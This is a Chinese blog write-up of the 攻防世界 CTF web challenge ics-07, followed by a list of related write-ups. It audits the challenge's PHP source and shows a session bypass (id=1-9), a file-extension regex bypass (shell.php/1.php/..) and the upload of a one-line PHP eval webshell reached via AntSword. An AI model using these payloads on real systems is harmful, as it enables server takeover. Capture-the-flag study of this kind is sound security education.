攻防世界web进阶区ics-07

最新推荐文章于 2023-06-15 11:25:29 发布
最新推荐文章于 2023-06-15 11:25:29 发布
阅读量436 收藏 2
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gongjingege/article/details/108013982
版权

题目描述:工控云管理系统项目管理页面解析漏洞

打开靶机

在这里插入图片描述
根据题目描述,点击项目管理

点击view-source可以查看源码

大概有三部分

1,

<?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?>

if (isset($_GET[page]) && $_GET[page] != ‘index.php’)
page存在且page不等于index,文件包含flag.php

2,

<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

拿到admin的session值, 将 c o n 的 内 容 写 入 到 con 的内容 写入到 confile

正则过滤,后缀名为php3,php4,php5,php7,.t,.tml

再将路径从backup修改为uploaded,即uploaded是真实路径

3,

<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

id 存在 ,floatval( G E T [ i d ] ) ! = = ‘ 1 ‘ 浮 点 不 为 1 , s u b s t r ( _GET[id]) !== ‘1‘ 浮点不为1 ,substr( GET[id])!==11substr(_GET[id], -1) === ‘9‘ 最后一位为9

payload:?page=flag.php&id=1-9&submit

在这里插入图片描述
接下来,上传一句话木马

con为 文件内容 file为文件名 post上传

con=<?php @eval($_POST[cmd]) ?>&file=shell.php/1.php/…

php/1.php绕过第二段代码

在这里插入图片描述

查看是否上传成功

uploaded/backup

在这里插入图片描述
shell.php上传成功

菜刀或蚁剑连接

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到了flag

知识点:审计代码php和mysql浮点数精确度差异考察,正则绕过,一句话木马

参考文章:http://www.mamicode.com/info-detail-3043269.html

2020.8.14 公瑾

gongjingege
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-Web高手进阶 ics-07
feng的博客
10-28 261
WP 进入环境,按照提示进入项目管理页面,点击view-source得到源码: <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else { header('Location: ?p
Web安全攻防世界09 ics-07(XCTF)
weixin_42789937的博客
01-29 956
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
攻防世界----ics-07
qq_44418229的博客
07-26 399
攻防世界---ics-07 分析源码+正则
【愚公系列】2023年06月 攻防世界-Webics-07
最新发布
时光隧道
06-15 4099
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
攻防世界WEB】难度五星15分进阶题:ics-07
07-24 570
攻防世界WEB】五星15分
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Let-god-knows杂项
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
攻防世界 ics-07
CyhDl666的博客
02-24 481
ics-07 hint:工控云管理系统项目管理页面解析漏洞 进入管理页面是个登录窗 左下角有个查看源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'.
攻防世界web进阶ics-07详解
hxhxhxhxx的博客
08-07 1483
攻防世界web进阶ics-07详解题目详解floatvalsubstr 题目 当然又是熟悉的界面,熟悉的ics题目,熟悉的只能点击一个页面 详解 这里进来有一个view-source 点击看看 是一堆代码。我们进行尝试审计 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]
攻防世界-web-ics-07-从0到1的解题历程writeup
CTF小白的博客
04-17 3360
题目分析 首先拿到题目描述:工控云管理系统项目管理页面解析漏洞 找到题目入口 点击view-source对源码进行审计 if (isset($_GET[page]) && $_GET[page] != 'index.php') {      include('f...
攻防世界 web高手进阶 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 841
继续ctf的旅程,攻防世界web高手进阶的6分题:ics-07、unfinish、i-got-id-200
攻防世界-web-高手进阶1-ics-06
wyj_1216 House
07-06 2886
题目 writeup 首先打开这个界面,看起来好高大上 随便点点 发先报表中心可以点进去界面 一开始还以为sql注入 尝试好多,没有回显 结果最后发现是爆破(哭) 爆破常规操作一波 得到当id=2333时,得到flag 知识点 爆破: https://blog.csdn.net/wyj_1216/article/details/90452373 见0x03Weak_auth ...
[wp] 攻防世界 ics-02
MercyLin的博客
09-29 2869
进去扫目录发现/secret 无法直接进入secret_debug.php 显示ip不对 点paper会向download.php传参,可以下载一个ssrf内容的pdf, 于是想到利用ssrf来访问secret_debug.php 发现参数s,fuzz一下,发现s=3时会有如下返回 经测试在此页面发现sql注入漏洞,进行注入得到flag,脚本如下: import requests impor...
CTF -攻防世界-web高手-ics-06
aon8069924165211的博客
08-05 1423
打开网址 根据题意点开报表中心(因为其他的点开都一样,不信你试试) 会看见id =1 想到burp爆破id 所以打开burp抓包(不会抓包的百度 或者看我web新手,有一题就有抓包 我说的很详细) 右击 然后你会发现 会发现id=2333时候length不一样 注意 不要一个个找 length点一下会排序。。。 ok搞定 ...
攻防世界web ics-07 writeup
qq_45837896的博客
07-18 231
熟悉的界面,仍旧是点哪个哪个不能开的选项,只有项目管理能进入 那个view source是可以点的,不是让F12 开始代码审计 page选其它页面直接绕过… 第二段要求admin为true,所以先看第三段 要求传id值,其浮点数不能为1且该字符串最后一位为9. 于是使用1-9或者1/9(此处有疑惑) 进行传值有 admin为true,再次看源码 传file文件名,还有con(文件写入的数据)。 后面进行正则判断,题要从/.开始判断,要想绕过我们可以给文件起名为j.php/. 也就是说在文件名目录下加了个空目
ctf 图片 php_PHP代码审计之CTF系列(1)
weixin_33450988的博客
03-09 991
PHP代码审计之CTF系列(1)采用github yaofeifly师傅的PHP练习。每个内容均采用docker。部署过程:进入对应的docker_env,使用docker-compose builddocker-compose up -d进入对应docker进程,查看地址访问即可。challenge 1访问地址,发现源码1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZg...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值